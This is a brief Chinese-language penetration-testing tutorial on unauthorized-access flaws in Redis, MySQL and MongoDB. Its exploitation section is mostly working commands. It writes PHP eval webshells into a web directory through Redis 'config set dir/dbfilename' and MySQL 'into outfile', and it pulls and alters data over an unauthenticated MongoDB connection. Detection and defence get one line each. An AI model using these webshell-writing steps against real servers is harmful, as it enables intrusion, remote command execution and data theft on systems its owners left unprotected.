1、概述
服务或应用未授权或者鉴权失效导致被恶意攻击,广义上来讲,鉴权绕过也属于未授权访问。
- 分类:Web通用漏洞
- 风险等级及危害:
- 严重:可完全控制服务器、执行系统命令。
- 高危:可获取数据库大量敏感信息或对系统进行控制。
- 低危:可登录系统,但无法通过当前权限的操作造成实际危害。
有以下几种:
- Redis未授权访问漏洞
- Mysql未授权访问漏洞
- MongoDB未授权访问漏洞
- 。。。
2、漏洞利用
2.1、Redis未授权访问漏洞
开放端口:6379
利用方法:写文件Getshell、获取数据
config get dir #查看redis数据库路径
config set dir /root/redis-2.8.17# #修改靶机Redis数据库路径
config set dbfilename shell.php #生成shell.php文件
set xxx "\r\n\r\n<?php phpinfo();?>\r\n\r\n"#将一句话木马写入文件中
#"\r\n\r\n"是换行的意思,用redis写入文件会自带一些版本信息,如果不换行可能导致无法执行。
set xxx "\r\n\r\n<?php eval($_POST[whoami]);?>\r\n\r\n"#上传木马可以通过蚁剑连接
save
2.2、Mysql未授权访问漏洞
开放端口:3306
利用方法:爆破弱口令、写文件、远程连接获取数据
select'<?php @eval($_POST[1])?>'into outfile '/data/www/1.php'
2.3、MongoDB未授权访问漏洞
开放端口:27017
利用方法:远程连接获取数据
Show dbs //查询所有数据库
Use websec //选择数据库,没有就创建
db.websec.insert({"name":"websec is ez"}) //插入数据
db.websec.find().pretty() //查询所有数据
3、漏洞挖掘
对这几个常用端口进行测试
4、漏洞防御
开启身份验证